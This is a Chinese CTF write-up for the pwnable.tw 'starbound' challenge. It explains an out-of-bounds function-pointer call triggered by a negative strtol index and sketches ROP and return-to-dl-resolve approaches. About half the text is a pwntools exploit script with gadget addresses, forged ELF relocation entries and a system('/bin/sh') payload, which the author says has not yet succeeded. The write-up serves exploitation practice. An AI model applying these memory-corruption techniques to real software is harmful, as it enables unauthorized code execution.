【pwnable.tw】 starbound

此题的代码量很大，看了一整天的逻辑代码，没发现什么问题...

整个函数的逻辑主要是红框中两个指针的循环赋值和调用，其中第一个指针是主功能函数，第二个数组是子功能函数。

函数的漏洞主要在main函数中，main函数中使用了strtol函数将用户输入转换为字符串，并根据此转换结果，对子函数进行访问。

当用户输入过大或过小时，会导致越界访问的问题，其中，strtol函数的返回值可能为负数。

bss段中，用户输入的名称最开始是随机生成的，但用户可以更改。而此字段在函数指针数组上面，也就是说，用户可以通过控制名称的方式获得一次指令执行的机会

再查看一下安全保护机制

可以使用ROP的方式来利用漏洞。由于main函数中用户可以输入0x100长的字符给v5，因此，v5可作为ROP的存放位置，在name中找到一个gadget使得EIP跳转到位于栈上v5字段内即可。

由于此题没有附带libc，也没找到可以泄露地址的漏洞，因此在ROP中使用了在plt区域有的open、read、puts函数来打印flag，其中从dalao那里get的知识点是，read函数的第一个参数是一个int类型的值，

用于标识文件身份，其中0 ： stdin、1：stdout、2：stderr，本题内没有打开未关闭的文件，因此read(3,&buf,0x10)完全可以读出flag。

另外，恰巧在最近接触到了return to dl-resolve的原理：http://www.freebuf.com/articles/system/149214.html

此题恰巧也符合使用该技术的先决条件，但貌似ld.so做了保护，没有成功，在网上没有找到相关的保护手段，通过调试发现ld.so以偏移量获取了程序.gnu.version的内容，进一步运算，但我构造的偏移量过大，

导致运算超出了可读写的范围，造成程序崩溃。暂未找到其他方法，此坑以后再填。

暂存未成功的return-to-dl-resolve代码：

from pwn import *
debug = 1
context(arch='i386',os='linux',endian='little')
context.log_level='debug'
elf = ELF('./starbound')
if debug:
    p=process('./starbound')
    file = '~/Desktop/pwn/tw/starbound/flag'

else:
    p=remote('chall.pwnable.tw',10202)
file = '/home/starbound/flag\0\0\0\0'
file = '/bin/sh\0' + '\0'*(len(file)-len('/bin/sh\0'))
gadget = 0x08048e48
bss_function = 0x08058150
bss_name = 0x080580D0

shellcode = file + p32(gadget) + p32(0x0805509c) + p32(0x00002807) + 'a'*8
print '[*] shellcode len ',len(shellcode)
print '[*] ',hex(bss_name + len(shellcode) - 0x80481dc)
shellcode = file + p32(gadget) + p32(0x0805509c) + p32(0x00002807) + 'a'*8 + p32(0xe1)+p32(0)+p32(0)+p32(0x12)
distance3 = bss_name + len(shellcode) - 0x80484fc
print '[*] ',hex(distance3)
shellcode = file + p32(gadget) + p32(0x0805509c) + p32(0x000ff207) + 'a'*8 + p32(distance3)+p32(0)+p32(0)+p32(0x12) + 'system\x00'
shellcode = file + p32(gadget) + p32(0x0805509c) + p32(0x00002807) + 'a'*8 + p32(0xe1)+p32(0)+p32(0)+p32(0x12)
p.recvuntil('> ')
p.send('')
p.recvuntil('> ')
p.send('')
p.recvuntil(': ')
p.sendline(shellcode)
p.recvuntil('> ')

distance = (bss_name + len(file) - bss_function)/4
#print str(distance)
gdb.attach(p,'b *0x0804A65D')
distance2 = bss_name + len(file) + 4 - 0x80487c8
cat_flag_exp = str(distance-1) + '\0' + 'a'*4 + p32(0x8048940) + p32(distance2) + p32(0xdeadbeef) + p32(bss_name)
'''
+ p32(elf.symbols['open']) + p32(gadget) + p32(bss_name) \
+ p32(0)+ 'a'*(0x1c-8) + p32(elf.symbols['read']) + p32(gadget) + p32(3) + p32(bss_name+20) + p32(0x40) +'a'*(0x1c-12) + p32(elf.symbols['puts']) + p32(0xdeadbeef) + p32(bss_name+20)
'''
'''
$ readelf -d starbound | grep JMPREL
 0x00000017 (JMPREL)                     0x80487c8

gdb-peda$ x /2x 0x80487c8+0x120
0x80488e8:    0x0805509c    0x00002807

readelf -d starbound | grep SYM
 0x00000006 (SYMTAB)                     0x80481dc
 0x0000000b (SYMENT)                     16 (bytes)
 0x6ffffff0 (VERSYM)                     0x80486f2

$ readelf -d starbound | grep STRTAB
 0x00000005 (STRTAB)                     0x80484fc

'''

p.sendline(cat_flag_exp)
p.interactive()

#0x08048e48 : add esp, 0x1c ; ret